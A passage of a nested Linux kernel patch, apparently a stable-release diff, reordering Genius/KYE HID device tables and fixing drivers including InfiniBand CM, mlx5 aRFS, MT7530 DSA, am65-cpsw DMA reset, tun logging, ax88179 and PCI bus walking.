++	case USB_DEVICE_ID_GENIUS_GX_IMPERATOR:
++		rdesc = kye_consumer_control_fixup(hdev, rdesc, rsize, 83,
++					"Genius Gx Imperator Keyboard");
++		break;
+ 	case USB_DEVICE_ID_KYE_EASYPEN_I405X:
+ 		if (*rsize == EASYPEN_I405X_RDESC_ORIG_SIZE) {
+ 			rdesc = easypen_i405x_rdesc_fixed;
+@@ -638,18 +650,6 @@ static __u8 *kye_report_fixup(struct hid_device *hdev, __u8 *rdesc,
+ 			*rsize = sizeof(pensketch_m912_rdesc_fixed);
+ 		}
+ 		break;
+-	case USB_DEVICE_ID_GENIUS_GILA_GAMING_MOUSE:
+-		rdesc = kye_consumer_control_fixup(hdev, rdesc, rsize, 104,
+-					"Genius Gila Gaming Mouse");
+-		break;
+-	case USB_DEVICE_ID_GENIUS_GX_IMPERATOR:
+-		rdesc = kye_consumer_control_fixup(hdev, rdesc, rsize, 83,
+-					"Genius Gx Imperator Keyboard");
+-		break;
+-	case USB_DEVICE_ID_GENIUS_MANTICORE:
+-		rdesc = kye_consumer_control_fixup(hdev, rdesc, rsize, 104,
+-					"Genius Manticore Keyboard");
+-		break;
+ 	}
+ 	return rdesc;
+ }
+@@ -717,26 +717,26 @@ static int kye_probe(struct hid_device *hdev, const struct hid_device_id *id)
+ 	}
+ 
+ 	switch (id->product) {
++	case USB_DEVICE_ID_GENIUS_MANTICORE:
++		/*
++		 * The manticore keyboard needs to have all the interfaces
++		 * opened at least once to be fully functional.
++		 */
++		if (hid_hw_open(hdev))
++			hid_hw_close(hdev);
++		break;
+ 	case USB_DEVICE_ID_KYE_EASYPEN_I405X:
+ 	case USB_DEVICE_ID_KYE_MOUSEPEN_I608X:
+-	case USB_DEVICE_ID_KYE_MOUSEPEN_I608X_V2:
+ 	case USB_DEVICE_ID_KYE_EASYPEN_M610X:
+-	case USB_DEVICE_ID_KYE_EASYPEN_M406XE:
+ 	case USB_DEVICE_ID_KYE_PENSKETCH_M912:
++	case USB_DEVICE_ID_KYE_EASYPEN_M406XE:
++	case USB_DEVICE_ID_KYE_MOUSEPEN_I608X_V2:
+ 		ret = kye_tablet_enable(hdev);
+ 		if (ret) {
+ 			hid_err(hdev, "tablet enabling failed\n");
+ 			goto enabling_err;
+ 		}
+ 		break;
+-	case USB_DEVICE_ID_GENIUS_MANTICORE:
+-		/*
+-		 * The manticore keyboard needs to have all the interfaces
+-		 * opened at least once to be fully functional.
+-		 */
+-		if (hid_hw_open(hdev))
+-			hid_hw_close(hdev);
+-		break;
+ 	}
+ 
+ 	return 0;
+@@ -749,23 +749,23 @@ static int kye_probe(struct hid_device *hdev, const struct hid_device_id *id)
+ static const struct hid_device_id kye_devices[] = {
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_KYE, USB_DEVICE_ID_KYE_ERGO_525V) },
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_KYE,
+-				USB_DEVICE_ID_KYE_EASYPEN_I405X) },
++				USB_DEVICE_ID_GENIUS_GILA_GAMING_MOUSE) },
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_KYE,
+-				USB_DEVICE_ID_KYE_MOUSEPEN_I608X) },
++				USB_DEVICE_ID_GENIUS_MANTICORE) },
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_KYE,
+-				USB_DEVICE_ID_KYE_MOUSEPEN_I608X_V2) },
++				USB_DEVICE_ID_GENIUS_GX_IMPERATOR) },
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_KYE,
+-				USB_DEVICE_ID_KYE_EASYPEN_M610X) },
++				USB_DEVICE_ID_KYE_EASYPEN_I405X) },
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_KYE,
+-				USB_DEVICE_ID_KYE_EASYPEN_M406XE) },
++				USB_DEVICE_ID_KYE_MOUSEPEN_I608X) },
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_KYE,
+-				USB_DEVICE_ID_GENIUS_GILA_GAMING_MOUSE) },
++				USB_DEVICE_ID_KYE_EASYPEN_M610X) },
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_KYE,
+-				USB_DEVICE_ID_GENIUS_GX_IMPERATOR) },
++				USB_DEVICE_ID_KYE_PENSKETCH_M912) },
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_KYE,
+-				USB_DEVICE_ID_GENIUS_MANTICORE) },
++				USB_DEVICE_ID_KYE_EASYPEN_M406XE) },
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_KYE,
+-				USB_DEVICE_ID_KYE_PENSKETCH_M912) },
++				USB_DEVICE_ID_KYE_MOUSEPEN_I608X_V2) },
+ 	{ }
+ };
+ MODULE_DEVICE_TABLE(hid, kye_devices);
+diff --git a/drivers/hid/hid-quirks.c b/drivers/hid/hid-quirks.c
+index 60884066362a1..debc49272a5c0 100644
+--- a/drivers/hid/hid-quirks.c
++++ b/drivers/hid/hid-quirks.c
+@@ -107,12 +107,12 @@ static const struct hid_device_id hid_quirks[] = {
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_HP, USB_PRODUCT_ID_HP_PIXART_OEM_USB_OPTICAL_MOUSE_1f4a), HID_QUIRK_ALWAYS_POLL },
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_IDEACOM, USB_DEVICE_ID_IDEACOM_IDC6680), HID_QUIRK_MULTI_INPUT },
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_INNOMEDIA, USB_DEVICE_ID_INNEX_GENESIS_ATARI), HID_QUIRK_MULTI_INPUT },
+-	{ HID_USB_DEVICE(USB_VENDOR_ID_KYE, USB_DEVICE_ID_KYE_EASYPEN_M610X), HID_QUIRK_MULTI_INPUT },
++	{ HID_USB_DEVICE(USB_VENDOR_ID_KYE, USB_DEVICE_ID_PIXART_USB_OPTICAL_MOUSE_ID2), HID_QUIRK_ALWAYS_POLL },
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_KYE, USB_DEVICE_ID_KYE_MOUSEPEN_I608X), HID_QUIRK_MULTI_INPUT },
+-	{ HID_USB_DEVICE(USB_VENDOR_ID_KYE, USB_DEVICE_ID_KYE_MOUSEPEN_I608X_V2), HID_QUIRK_MULTI_INPUT },
++	{ HID_USB_DEVICE(USB_VENDOR_ID_KYE, USB_DEVICE_ID_KYE_EASYPEN_M610X), HID_QUIRK_MULTI_INPUT },
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_KYE, USB_DEVICE_ID_KYE_PENSKETCH_M912), HID_QUIRK_MULTI_INPUT },
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_KYE, USB_DEVICE_ID_KYE_EASYPEN_M406XE), HID_QUIRK_MULTI_INPUT },
+-	{ HID_USB_DEVICE(USB_VENDOR_ID_KYE, USB_DEVICE_ID_PIXART_USB_OPTICAL_MOUSE_ID2), HID_QUIRK_ALWAYS_POLL },
++	{ HID_USB_DEVICE(USB_VENDOR_ID_KYE, USB_DEVICE_ID_KYE_MOUSEPEN_I608X_V2), HID_QUIRK_MULTI_INPUT },
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_LENOVO, USB_DEVICE_ID_LENOVO_OPTICAL_USB_MOUSE_600E), HID_QUIRK_ALWAYS_POLL },
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_LENOVO, USB_DEVICE_ID_LENOVO_PIXART_USB_MOUSE_608D), HID_QUIRK_ALWAYS_POLL },
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_LENOVO, USB_DEVICE_ID_LENOVO_PIXART_USB_MOUSE_6019), HID_QUIRK_ALWAYS_POLL },
+diff --git a/drivers/infiniband/core/cm.c b/drivers/infiniband/core/cm.c
+index 462a10d6a5762..950fe205995b7 100644
+--- a/drivers/infiniband/core/cm.c
++++ b/drivers/infiniband/core/cm.c
+@@ -1026,23 +1026,26 @@ static void cm_reset_to_idle(struct cm_id_private *cm_id_priv)
+ 	}
+ }
+ 
+-static noinline void cm_destroy_id_wait_timeout(struct ib_cm_id *cm_id)
++static noinline void cm_destroy_id_wait_timeout(struct ib_cm_id *cm_id,
++						enum ib_cm_state old_state)
+ {
+ 	struct cm_id_private *cm_id_priv;
+ 
+ 	cm_id_priv = container_of(cm_id, struct cm_id_private, id);
+-	pr_err("%s: cm_id=%p timed out. state=%d refcnt=%d\n", __func__,
+-	       cm_id, cm_id->state, refcount_read(&cm_id_priv->refcount));
++	pr_err("%s: cm_id=%p timed out. state %d -> %d, refcnt=%d\n", __func__,
++	       cm_id, old_state, cm_id->state, refcount_read(&cm_id_priv->refcount));
+ }
+ 
+ static void cm_destroy_id(struct ib_cm_id *cm_id, int err)
+ {
+ 	struct cm_id_private *cm_id_priv;
++	enum ib_cm_state old_state;
+ 	struct cm_work *work;
+ 	int ret;
+ 
+ 	cm_id_priv = container_of(cm_id, struct cm_id_private, id);
+ 	spin_lock_irq(&cm_id_priv->lock);
++	old_state = cm_id->state;
+ retest:
+ 	switch (cm_id->state) {
+ 	case IB_CM_LISTEN:
+@@ -1151,7 +1154,7 @@ static void cm_destroy_id(struct ib_cm_id *cm_id, int err)
+ 						  msecs_to_jiffies(
+ 						  CM_DESTROY_ID_WAIT_TIMEOUT));
+ 		if (!ret) /* timeout happened */
+-			cm_destroy_id_wait_timeout(cm_id);
++			cm_destroy_id_wait_timeout(cm_id, old_state);
+ 	} while (!ret);
+ 
+ 	while ((work = cm_dequeue_work(cm_id_priv)) != NULL)
+diff --git a/drivers/infiniband/hw/mlx5/mad.c b/drivers/infiniband/hw/mlx5/mad.c
+index 9c8a7b206dcf4..e61efed320f11 100644
+--- a/drivers/infiniband/hw/mlx5/mad.c
++++ b/drivers/infiniband/hw/mlx5/mad.c
+@@ -188,7 +188,8 @@ static int process_pma_cmd(struct mlx5_ib_dev *dev, u32 port_num,
+ 		mdev = dev->mdev;
+ 		mdev_port_num = 1;
+ 	}
+-	if (MLX5_CAP_GEN(dev->mdev, num_ports) == 1) {
++	if (MLX5_CAP_GEN(dev->mdev, num_ports) == 1 &&
++	    !mlx5_core_mp_enabled(mdev)) {
+ 		/* set local port to one for Function-Per-Port HCA. */
+ 		mdev = dev->mdev;
+ 		mdev_port_num = 1;
+diff --git a/drivers/infiniband/sw/rxe/rxe.c b/drivers/infiniband/sw/rxe/rxe.c
+index 51daac5c4feb7..be3ddfbf3cae3 100644
+--- a/drivers/infiniband/sw/rxe/rxe.c
++++ b/drivers/infiniband/sw/rxe/rxe.c
+@@ -33,6 +33,8 @@ void rxe_dealloc(struct ib_device *ib_dev)
+ 
+ 	if (rxe->tfm)
+ 		crypto_free_shash(rxe->tfm);
++
++	mutex_destroy(&rxe->usdev_lock);
+ }
+ 
+ /* initialize rxe device parameters */
+diff --git a/drivers/misc/mei/pci-me.c b/drivers/misc/mei/pci-me.c
+index f8219cbd2c7ce..a617f64a351dc 100644
+--- a/drivers/misc/mei/pci-me.c
++++ b/drivers/misc/mei/pci-me.c
+@@ -116,7 +116,7 @@ static const struct pci_device_id mei_me_pci_tbl[] = {
+ 	{MEI_PCI_DEVICE(MEI_DEV_ID_ADP_P, MEI_ME_PCH15_CFG)},
+ 	{MEI_PCI_DEVICE(MEI_DEV_ID_ADP_N, MEI_ME_PCH15_CFG)},
+ 
+-	{MEI_PCI_DEVICE(MEI_DEV_ID_RPL_S, MEI_ME_PCH15_CFG)},
++	{MEI_PCI_DEVICE(MEI_DEV_ID_RPL_S, MEI_ME_PCH15_SPS_CFG)},
+ 
+ 	{MEI_PCI_DEVICE(MEI_DEV_ID_MTL_M, MEI_ME_PCH15_CFG)},
+ 	{MEI_PCI_DEVICE(MEI_DEV_ID_ARL_S, MEI_ME_PCH15_CFG)},
+diff --git a/drivers/net/dsa/mt7530.c b/drivers/net/dsa/mt7530.c
+index d4515c19a5f34..1aba0cf38630f 100644
+--- a/drivers/net/dsa/mt7530.c
++++ b/drivers/net/dsa/mt7530.c
+@@ -419,6 +419,20 @@ static void mt7530_pll_setup(struct mt7530_priv *priv)
+ 	core_set(priv, CORE_TRGMII_GSW_CLK_CG, REG_GSWCK_EN);
+ }
+ 
++/* If port 6 is available as a CPU port, always prefer that as the default,
++ * otherwise express no preference.
++ */
++static struct dsa_port *
++mt753x_preferred_default_local_cpu_port(struct dsa_switch *ds)
++{
++	struct dsa_port *cpu_dp = dsa_to_port(ds, 6);
++
++	if (dsa_port_is_cpu(cpu_dp))
++		return cpu_dp;
++
++	return NULL;
++}
++
+ /* Setup port 6 interface mode and TRGMII TX circuit */
+ static int
+ mt7530_pad_clk_setup(struct dsa_switch *ds, phy_interface_t interface)
+@@ -1236,6 +1250,13 @@ mt753x_cpu_port_enable(struct dsa_switch *ds, int port)
+ 	if (priv->id == ID_MT7530 || priv->id == ID_MT7621)
+ 		mt7530_rmw(priv, MT7530_MFC, CPU_MASK, CPU_EN | CPU_PORT(port));
+ 
++	/* Add the CPU port to the CPU port bitmap for MT7531. Trapped frames
++	 * will be forwarded to the CPU port that is affine to the inbound user
++	 * port.
++	 */
++	if (priv->id == ID_MT7531)
++		mt7530_set(priv, MT7531_CFC, MT7531_CPU_PMAP(BIT(port)));
++
+ 	/* CPU port gets connected to all user ports of
+ 	 * the switch.
+ 	 */
+@@ -2413,8 +2434,6 @@ mt7530_setup(struct dsa_switch *ds)
+ 		     SYS_CTRL_PHY_RST | SYS_CTRL_SW_RST |
+ 		     SYS_CTRL_REG_RST);
+ 
+-	mt7530_pll_setup(priv);
+-
+ 	/* Lower Tx driving for TRGMII path */
+ 	for (i = 0; i < NUM_TRGMII_CTRL; i++)
+ 		mt7530_write(priv, MT7530_TRGMII_TD_ODT(i),
+@@ -2432,6 +2451,9 @@ mt7530_setup(struct dsa_switch *ds)
+ 
+ 	priv->p6_interface = PHY_INTERFACE_MODE_NA;
+ 
++	if ((val & HWTRAP_XTAL_MASK) == HWTRAP_XTAL_40MHZ)
++		mt7530_pll_setup(priv);
++
+ 	mt753x_trap_frames(priv);
+ 
+ 	/* Enable and reset MIB counters */
+@@ -2461,6 +2483,9 @@ mt7530_setup(struct dsa_switch *ds)
+ 			   PVC_EG_TAG(MT7530_VLAN_EG_CONSISTENT));
+ 	}
+ 
++	/* Allow mirroring frames received on the local port (monitor port). */
++	mt7530_set(priv, MT753X_AGC, LOCAL_EN);
++
+ 	/* Setup VLAN ID 0 for VLAN-unaware bridges */
+ 	ret = mt7530_setup_vlan0(priv);
+ 	if (ret)
+@@ -2531,16 +2556,8 @@ static int
+ mt7531_setup_common(struct dsa_switch *ds)
+ {
+ 	struct mt7530_priv *priv = ds->priv;
+-	struct dsa_port *cpu_dp;
+ 	int ret, i;
+ 
+-	/* BPDU to CPU port */
+-	dsa_switch_for_each_cpu_port(cpu_dp, ds) {
+-		mt7530_rmw(priv, MT7531_CFC, MT7531_CPU_PMAP_MASK,
+-			   BIT(cpu_dp->index));
+-		break;
+-	}
+-
+ 	mt753x_trap_frames(priv);
+ 
+ 	/* Enable and reset MIB counters */
+@@ -2577,6 +2594,9 @@ mt7531_setup_common(struct dsa_switch *ds)
+ 			   PVC_EG_TAG(MT7530_VLAN_EG_CONSISTENT));
+ 	}
+ 
++	/* Allow mirroring frames received on the local port (monitor port). */
++	mt7530_set(priv, MT753X_AGC, LOCAL_EN);
++
+ 	/* Flush the FDB table */
+ 	ret = mt7530_fdb_cmd(priv, MT7530_FDB_FLUSH, NULL);
+ 	if (ret < 0)
+@@ -2655,18 +2675,25 @@ mt7531_setup(struct dsa_switch *ds)
+ 	priv->p5_interface = PHY_INTERFACE_MODE_NA;
+ 	priv->p6_interface = PHY_INTERFACE_MODE_NA;
+ 
+-	/* Enable PHY core PLL, since phy_device has not yet been created
+-	 * provided for phy_[read,write]_mmd_indirect is called, we provide
+-	 * our own mt7531_ind_mmd_phy_[read,write] to complete this
+-	 * function.
++	/* Enable Energy-Efficient Ethernet (EEE) and the PHY core PLL. Since
++	 * no phy_device has been created yet to be passed to
++	 * phy_[read,write]_mmd_indirect, we provide our own
++	 * mt7531_ind_mmd_phy_[read,write] to complete this function.
+ 	 */
+ 	val = mt7531_ind_c45_phy_read(priv, MT753X_CTRL_PHY_ADDR,
+ 				      MDIO_MMD_VEND2, CORE_PLL_GROUP4);
+-	val |= MT7531_PHY_PLL_BYPASS_MODE;
++	val |= MT7531_RG_SYSPLL_DMY2 | MT7531_PHY_PLL_BYPASS_MODE;
+ 	val &= ~MT7531_PHY_PLL_OFF;
+ 	mt7531_ind_c45_phy_write(priv, MT753X_CTRL_PHY_ADDR, MDIO_MMD_VEND2,
+ 				 CORE_PLL_GROUP4, val);
+ 
++	/* Disable EEE advertisement on the switch PHYs. */
++	for (i = MT753X_CTRL_PHY_ADDR;
++	     i < MT753X_CTRL_PHY_ADDR + MT7530_NUM_PHYS; i++) {
++		mt7531_ind_c45_phy_write(priv, i, MDIO_MMD_AN, MDIO_AN_EEE_ADV,
++					 0);
++	}
++
+ 	mt7531_setup_common(ds);
+ 
+ 	/* Setup VLAN ID 0 for VLAN-unaware bridges */
+@@ -3400,6 +3427,7 @@ static int mt753x_set_mac_eee(struct dsa_switch *ds, int port,
+ static const struct dsa_switch_ops mt7530_switch_ops = {
+ 	.get_tag_protocol	= mtk_get_tag_protocol,
+ 	.setup			= mt753x_setup,
++	.preferred_default_local_cpu_port = mt753x_preferred_default_local_cpu_port,
+ 	.get_strings		= mt7530_get_strings,
+ 	.get_ethtool_stats	= mt7530_get_ethtool_stats,
+ 	.get_sset_count		= mt7530_get_sset_count,
+diff --git a/drivers/net/dsa/mt7530.h b/drivers/net/dsa/mt7530.h
+index 2d1ea390f05ab..6441e8d7f05d9 100644
+--- a/drivers/net/dsa/mt7530.h
++++ b/drivers/net/dsa/mt7530.h
+@@ -31,6 +31,10 @@ enum mt753x_id {
+ #define SYSC_REG_RSTCTRL		0x34
+ #define  RESET_MCM			BIT(2)
+ 
++/* Register for ARL global control */
++#define MT753X_AGC			0xc
++#define  LOCAL_EN			BIT(7)
++
+ /* Registers to mac forward control for unknown frames */
+ #define MT7530_MFC			0x10
+ #define  BC_FFP(x)			(((x) & 0xff) << 24)
+@@ -53,6 +57,7 @@ enum mt753x_id {
+ #define  MT7531_MIRROR_PORT_GET(x)	(((x) >> 16) & MIRROR_MASK)
+ #define  MT7531_MIRROR_PORT_SET(x)	(((x) & MIRROR_MASK) << 16)
+ #define  MT7531_CPU_PMAP_MASK		GENMASK(7, 0)
++#define  MT7531_CPU_PMAP(x)		FIELD_PREP(MT7531_CPU_PMAP_MASK, x)
+ 
+ #define MT753X_MIRROR_REG(id)		(((id) == ID_MT7531) ? \
+ 					 MT7531_CFC : MT7530_MFC)
+@@ -668,6 +673,7 @@ enum mt7531_clk_skew {
+ #define  RG_SYSPLL_DDSFBK_EN		BIT(12)
+ #define  RG_SYSPLL_BIAS_EN		BIT(11)
+ #define  RG_SYSPLL_BIAS_LPF_EN		BIT(10)
++#define  MT7531_RG_SYSPLL_DMY2		BIT(6)
+ #define  MT7531_PHY_PLL_OFF		BIT(5)
+ #define  MT7531_PHY_PLL_BYPASS_MODE	BIT(4)
+ 
+diff --git a/drivers/net/ethernet/intel/ice/ice_tc_lib.c b/drivers/net/ethernet/intel/ice/ice_tc_lib.c
+index 652ef09eeb305..ec6628aacc13b 100644
+--- a/drivers/net/ethernet/intel/ice/ice_tc_lib.c
++++ b/drivers/net/ethernet/intel/ice/ice_tc_lib.c
+@@ -663,7 +663,7 @@ ice_eswitch_add_tc_fltr(struct ice_vsi *vsi, struct ice_tc_flower_fltr *fltr)
+ 	int ret;
+ 	int i;
+ 
+-	if (!flags || (flags & ICE_TC_FLWR_FIELD_ENC_SRC_L4_PORT)) {
++	if (flags & ICE_TC_FLWR_FIELD_ENC_SRC_L4_PORT) {
+ 		NL_SET_ERR_MSG_MOD(fltr->extack, "Unsupported encap field(s)");
+ 		return -EOPNOTSUPP;
+ 	}
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en_arfs.c b/drivers/net/ethernet/mellanox/mlx5/core/en_arfs.c
+index 58eacba6de8cd..ad51edf553185 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en_arfs.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en_arfs.c
+@@ -45,6 +45,10 @@ struct arfs_table {
+ 	struct hlist_head	 rules_hash[ARFS_HASH_SIZE];
+ };
+ 
++enum {
++	MLX5E_ARFS_STATE_ENABLED,
++};
++
+ enum arfs_type {
+ 	ARFS_IPV4_TCP,
+ 	ARFS_IPV6_TCP,
+@@ -60,6 +64,7 @@ struct mlx5e_arfs_tables {
+ 	struct list_head               rules;
+ 	int                            last_filter_id;
+ 	struct workqueue_struct        *wq;
++	unsigned long                  state;
+ };
+ 
+ struct arfs_tuple {
+@@ -170,6 +175,8 @@ int mlx5e_arfs_enable(struct mlx5e_flow_steering *fs)
+ 			return err;
+ 		}
+ 	}
++	set_bit(MLX5E_ARFS_STATE_ENABLED, &arfs->state);
++
+ 	return 0;
+ }
+ 
+@@ -454,6 +461,8 @@ static void arfs_del_rules(struct mlx5e_flow_steering *fs)
+ 	int i;
+ 	int j;
+ 
++	clear_bit(MLX5E_ARFS_STATE_ENABLED, &arfs->state);
++
+ 	spin_lock_bh(&arfs->arfs_lock);
+ 	mlx5e_for_each_arfs_rule(rule, htmp, arfs->arfs_tables, i, j) {
+ 		hlist_del_init(&rule->hlist);
+@@ -621,17 +630,8 @@ static void arfs_handle_work(struct work_struct *work)
+ 	struct mlx5_flow_handle *rule;
+ 
+ 	arfs = mlx5e_fs_get_arfs(priv->fs);
+-	mutex_lock(&priv->state_lock);
+-	if (!test_bit(MLX5E_STATE_OPENED, &priv->state)) {
+-		spin_lock_bh(&arfs->arfs_lock);
+-		hlist_del(&arfs_rule->hlist);
+-		spin_unlock_bh(&arfs->arfs_lock);
+-
+-		mutex_unlock(&priv->state_lock);
+-		kfree(arfs_rule);
+-		goto out;
+-	}
+-	mutex_unlock(&priv->state_lock);
++	if (!test_bit(MLX5E_ARFS_STATE_ENABLED, &arfs->state))
++		return;
+ 
+ 	if (!arfs_rule->rule) {
+ 		rule = arfs_add_rule(priv, arfs_rule);
+@@ -744,6 +744,11 @@ int mlx5e_rx_flow_steer(struct net_device *dev, const struct sk_buff *skb,
+ 		return -EPROTONOSUPPORT;
+ 
+ 	spin_lock_bh(&arfs->arfs_lock);
++	if (!test_bit(MLX5E_ARFS_STATE_ENABLED, &arfs->state)) {
++		spin_unlock_bh(&arfs->arfs_lock);
++		return -EPERM;
++	}
++
+ 	arfs_rule = arfs_find_rule(arfs_t, &fk);
+ 	if (arfs_rule) {
+ 		if (arfs_rule->rxq == rxq_index) {
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/lag/lag.c b/drivers/net/ethernet/mellanox/mlx5/core/lag/lag.c
+index ad32b80e85018..01c0e1ee918d8 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/lag/lag.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/lag/lag.c
+@@ -679,8 +679,10 @@ static int mlx5_deactivate_lag(struct mlx5_lag *ldev)
+ 		return err;
+ 	}
+ 
+-	if (test_bit(MLX5_LAG_MODE_FLAG_HASH_BASED, &flags))
++	if (test_bit(MLX5_LAG_MODE_FLAG_HASH_BASED, &flags)) {
+ 		mlx5_lag_port_sel_destroy(ldev);
++		ldev->buckets = 1;
++	}
+ 	if (mlx5_lag_has_drop_rule(ldev))
+ 		mlx5_lag_drop_rule_cleanup(ldev);
+ 
+diff --git a/drivers/net/ethernet/ti/am65-cpsw-nuss.c b/drivers/net/ethernet/ti/am65-cpsw-nuss.c
+index 76fabeae512db..33df06a2de13a 100644
+--- a/drivers/net/ethernet/ti/am65-cpsw-nuss.c
++++ b/drivers/net/ethernet/ti/am65-cpsw-nuss.c
+@@ -2549,6 +2549,8 @@ static void am65_cpsw_unregister_devlink(struct am65_cpsw_common *common)
+ 
+ static int am65_cpsw_nuss_register_ndevs(struct am65_cpsw_common *common)
+ {
++	struct am65_cpsw_rx_chn *rx_chan = &common->rx_chns;
++	struct am65_cpsw_tx_chn *tx_chan = common->tx_chns;
+ 	struct device *dev = common->dev;
+ 	struct devlink_port *dl_port;
+ 	struct am65_cpsw_port *port;
+@@ -2567,6 +2569,22 @@ static int am65_cpsw_nuss_register_ndevs(struct am65_cpsw_common *common)
+ 		return ret;
+ 	}
+ 
++	/* The DMA channels are not guaranteed to be in a clean state.
++	 * Reset and disable them to ensure that they are back in a
++	 * clean state and ready to be used.
++	 */
++	for (i = 0; i < common->tx_ch_num; i++) {
++		k3_udma_glue_reset_tx_chn(tx_chan[i].tx_chn, &tx_chan[i],
++					  am65_cpsw_nuss_tx_cleanup);
++		k3_udma_glue_disable_tx_chn(tx_chan[i].tx_chn);
++	}
++
++	for (i = 0; i < AM65_CPSW_MAX_RX_FLOWS; i++)
++		k3_udma_glue_reset_rx_chn(rx_chan->rx_chn, i, rx_chan,
++					  am65_cpsw_nuss_rx_cleanup, !!i);
++
++	k3_udma_glue_disable_rx_chn(rx_chan->rx_chn);
++
+ 	ret = am65_cpsw_nuss_register_devlink(common);
+ 	if (ret)
+ 		return ret;
+diff --git a/drivers/net/tun.c b/drivers/net/tun.c
+index 922d6f16d99d1..4af1ba5d074c0 100644
+--- a/drivers/net/tun.c
++++ b/drivers/net/tun.c
+@@ -2121,14 +2121,16 @@ static ssize_t tun_put_user(struct tun_struct *tun,
+ 					    tun_is_little_endian(tun), true,
+ 					    vlan_hlen)) {
+ 			struct skb_shared_info *sinfo = skb_shinfo(skb);
+-			pr_err("unexpected GSO type: "
+-			       "0x%x, gso_size %d, hdr_len %d\n",
+-			       sinfo->gso_type, tun16_to_cpu(tun, gso.gso_size),
+-			       tun16_to_cpu(tun, gso.hdr_len));
+-			print_hex_dump(KERN_ERR, "tun: ",
+-				       DUMP_PREFIX_NONE,
+-				       16, 1, skb->head,
+-				       min((int)tun16_to_cpu(tun, gso.hdr_len), 64), true);
++
++			if (net_ratelimit()) {
++				netdev_err(tun->dev, "unexpected GSO type: 0x%x, gso_size %d, hdr_len %d\n",
++					   sinfo->gso_type, tun16_to_cpu(tun, gso.gso_size),
++					   tun16_to_cpu(tun, gso.hdr_len));
++				print_hex_dump(KERN_ERR, "tun: ",
++					       DUMP_PREFIX_NONE,
++					       16, 1, skb->head,
++					       min((int)tun16_to_cpu(tun, gso.hdr_len), 64), true);
++			}
+ 			WARN_ON_ONCE(1);
+ 			return -EINVAL;
+ 		}
+diff --git a/drivers/net/usb/ax88179_178a.c b/drivers/net/usb/ax88179_178a.c
+index e0e9b4c53cb02..3078511f76083 100644
+--- a/drivers/net/usb/ax88179_178a.c
++++ b/drivers/net/usb/ax88179_178a.c
+@@ -1317,6 +1317,8 @@ static int ax88179_bind(struct usbnet *dev, struct usb_interface *intf)
+ 
+ 	netif_set_tso_max_size(dev->net, 16384);
+ 
++	ax88179_reset(dev);
++
+ 	return 0;
+ }
+ 
+@@ -1695,7 +1697,6 @@ static const struct driver_info ax88179_info = {
+ 	.unbind = ax88179_unbind,
+ 	.status = ax88179_status,
+ 	.link_reset = ax88179_link_reset,
+-	.reset = ax88179_reset,
+ 	.stop = ax88179_stop,
+ 	.flags = FLAG_ETHER | FLAG_FRAMING_AX,
+ 	.rx_fixup = ax88179_rx_fixup,
+@@ -1708,7 +1709,6 @@ static const struct driver_info ax88178a_info = {
+ 	.unbind = ax88179_unbind,
+ 	.status = ax88179_status,
+ 	.link_reset = ax88179_link_reset,
+-	.reset = ax88179_reset,
+ 	.stop = ax88179_stop,
+ 	.flags = FLAG_ETHER | FLAG_FRAMING_AX,
+ 	.rx_fixup = ax88179_rx_fixup,
+diff --git a/drivers/pci/bus.c b/drivers/pci/bus.c
+index feafa378bf8ea..aa2fba1c0f567 100644
+--- a/drivers/pci/bus.c
++++ b/drivers/pci/bus.c
+@@ -379,21 +379,8 @@ void pci_bus_add_devices(const struct pci_bus *bus)
+ }
+ EXPORT_SYMBOL(pci_bus_add_devices);
+ 
+-/** pci_walk_bus - walk devices on/under bus, calling callback.
+- *  @top      bus whose devices should be walked
+- *  @cb       callback to be called for each device found
+- *  @userdata arbitrary pointer to be passed to callback.
+- *
+- *  Walk the given bus, including any bridged devices
+- *  on buses under this bus.  Call the provided callback
+- *  on each device found.
+- *
+- *  We check the return of @cb each time. If it returns anything
+- *  other than 0, we break out.
+- *
+- */
+-void pci_walk_bus(struct pci_bus *top, int (*cb)(struct pci_dev *, void *),
+-		  void *userdata)
++static void __pci_walk_bus(struct pci_bus *top, int (*cb)(struct pci_dev *, void *),
++			   void *userdata, bool locked)
+ {
+ 	struct pci_dev *dev;
+ 	struct pci_bus *bus;
+@@ -401,7 +388,8 @@ void pci_walk_bus(struct pci_bus *top, int (*cb)(struct pci_dev *, void *),
+ 	int retval;
+ 
+ 	bus = top;
+-	down_read(&pci_bus_sem);
++	if (!locked)
++		down_read(&pci_bus_sem);
+ 	next = top->devices.next;
+ 	for (;;) {
+ 		if (next == &bus->devices) {
+@@ -424,10 +412,37 @@ void pci_walk_bus(struct pci_bus *top, int (*cb)(struct pci_dev *, void *),
+ 		if (retval)
+ 			break;
+ 	}
+-	up_read(&pci_bus_sem);
++	if (!locked)
++		up_read(&pci_bus_sem);
++}
++
++/**
++ *  pci_walk_bus - walk devices on/under bus, calling callback.
++ *  @top: bus whose devices should be walked
++ *  @cb: callback to be called for each device found
++ *  @userdata: arbitrary pointer to be passed to callback
++ *
++ *  Walk the given bus, including any bridged devices
++ *  on buses under this bus.  Call the provided callback
++ *  on each device found.
++ *
++ *  We check the return of @cb each time. If it returns anything
++ *  other than 0, we break out.
++ */
++void pci_walk_bus(struct pci_bus *top, int (*cb)(struct pci_dev *, void *), void *userdata)
++{
